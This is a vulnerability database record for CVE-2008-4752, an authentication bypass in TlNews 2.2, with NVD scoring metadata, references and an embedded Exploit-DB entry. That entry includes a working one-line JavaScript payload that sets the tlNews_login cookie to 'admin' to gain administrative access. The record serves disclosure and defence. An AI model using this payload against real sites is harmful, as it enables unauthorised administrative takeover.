ID CVE-2008-4752
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:32:00
Description
TlNews 2.2 allows remote attackers to bypass authentication and gain administrative access by setting the tlNews_login cookie to admin.
{"id": "CVE-2008-4752", "bulletinFamily": "NVD", "title": "CVE-2008-4752", "description": "TlNews 2.2 allows remote attackers to bypass authentication and gain administrative access by setting the tlNews_login cookie to admin.", "published": "2008-10-27T20:00:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4752", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/32405", "http://securityreason.com/securityalert/4511", "http://www.securityfocus.com/bid/31919", "https://exchange.xforce.ibmcloud.com/vulnerabilities/46116", "https://www.exploit-db.com/exploits/6836"], "cvelist": ["CVE-2008-4752"], "type": "cve", "lastseen": "2020-10-03T11:51:03", "edition": 3, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6836"]}], "modified": "2020-10-03T11:51:03", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-10-03T11:51:03", "rev": 2}, "vulnersScore": 7.8}, "cpe": ["cpe:/a:tech_logic:tlnews:2.2"], "affectedSoftware": [{"cpeName": "tech_logic:tlnews", "name": "tech logic tlnews", "operator": "eq", "version": "2.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:tech_logic:tlnews:2.2:*:*:*:*:*:*:*"], "cwe": ["CWE-287"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:tech_logic:tlnews:2.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T01:46:28", "description": "Tlnews 2.2 Insecure Cookie Handling Vulnerability. CVE-2008-4752. Webapps exploit for php platform", "published": "2008-10-25T00:00:00", "type": "exploitdb", "title": "Tlnews 2.2 Insecure Cookie Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4752"], "modified": "2008-10-25T00:00:00", "id": "EDB-ID:6836", "href": "https://www.exploit-db.com/exploits/6836/", "sourceData": "Tlnews 2.2 Admin Login Bypass (via Cookie)\nFound by X0r - EvolutionTeaM\nEmail: evolutionteam.x0[at]gmail[dot]com\n\nCms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip\n\nExploit: javascript:document.cookie = \"tlNews_login=admin; content=admin;\npath=/\"\n\nBeby y0ur system g0t d0wn :P \n\n// X0r - EvolutionTeaM\n\n# milw0rm.com [2008-10-25]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6836/"}]}